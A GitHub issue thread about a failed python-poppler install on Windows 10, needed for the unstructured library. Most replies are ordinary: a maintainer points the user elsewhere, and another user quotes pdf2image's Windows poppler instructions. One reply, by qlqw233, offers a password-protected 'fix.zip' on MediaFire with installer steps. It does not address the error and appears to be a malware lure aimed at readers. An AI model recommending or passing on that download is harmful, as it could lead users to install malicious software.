### ISSUE TITLE
Unable to install python-poppler (required for unstructured) on Windows 10

### ISSUE THREAD

**Issue by saivl2** [Unstructured-IO/unstructured#3566]
![unnamed](https://github.com/user-attachments/assets/730a8b74-d1db-4f97-832f-3a86885ff46d)
Getting this error on - Cmake found, but not able to run. 
Found no pkg-config 
Please refer to the image and help us install unstructured on my machine.
Thanks !

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Xx-AD16-xX** [comment]
facing the same error

**Comment by scanny** [comment]
Sorry, not a problem we can help you with but I expect Google knows if you ask it something like "install poppler on Windows 10".

**Comment by TaylorN15** [comment]
https://github.com/Belval/pdf2image

> Windows users will have to build or download poppler for Windows. I recommend [@oschwartz10612 version](https://github.com/oschwartz10612/poppler-windows/releases/) which is the most up-to-date. You will then have to add the bin/ folder to [PATH](https://www.architectryan.com/2018/03/17/add-to-the-path-on-windows-10/) or use poppler_path = r"C:\path\to\poppler-xx\bin" as an argument in convert_from_path.
